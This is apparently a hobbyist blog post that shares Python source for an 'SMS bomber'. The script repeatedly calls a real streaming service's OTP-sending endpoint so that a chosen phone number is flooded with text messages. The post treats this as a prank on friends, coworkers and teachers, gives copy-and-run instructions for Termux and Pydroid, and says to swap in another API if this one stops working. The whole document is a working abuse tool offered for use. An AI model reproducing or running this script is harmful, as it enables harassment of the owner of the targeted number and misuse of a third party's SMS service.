SMS Bombing Source Code ( Python )
SMS Bombing Is a SMS Spamming Types Work, you can fun it's with your friends, office staffs, worker friends, ( Teacher's 😁😜😬 ) ,etc.
Tap Long Press And Your Get Copy,Paste,Share Options You Copy The Codes And Paste Your Pydroid3, Termux nano, Any Python Installed Terminal os .
( This Post Is Not For Beginners! 🙁🥺 )
( This Api Maybe Sometimes later will be not doing so change it if it's no working )
↓↓↓
import requests
import time
number=str(input(" Enter The Number : "))
amount=int(input(" Enter The Amount : "))
api="https://stage.bioscopelive.com/en/login/send-otp?phone=88"+number+"&operator=bd-otp"
for i in range(amount):
requests.get(api)
print(str(i+1)+" SMS Sent")
#bioscope_is_not_do_send_sms_fast_thats_why_30s_timer_will_be_programed
time.sleep(30)
ByTheWay Install This File Else you have face any problem to run this program !!